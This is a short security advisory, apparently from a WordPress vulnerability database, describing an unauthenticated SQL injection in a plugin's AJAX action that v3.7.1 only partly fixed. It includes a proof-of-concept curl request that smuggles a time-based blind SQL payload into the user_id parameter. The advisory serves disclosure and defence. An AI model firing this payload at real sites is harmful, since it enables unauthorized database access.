The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users Note: v3.7.1 removed the AJAX actions from being available to unauthenticated users, however the SQLi is still present but exploitable by authenticated users and a separate advisory has been made
curl 'https://example.com/wp-admin/admin-ajax.php' --data 'action=get-achievements&total_only=true&user_id=11 AND (SELECT 9628 FROM (SELECT(SLEEP(5)))WOrh)-- KUsb'
cydave
cydave
Yes
2022-04-13 (about 1 years ago)
2022-04-13 (about 1 years ago)
2022-08-23 (about 9 months ago)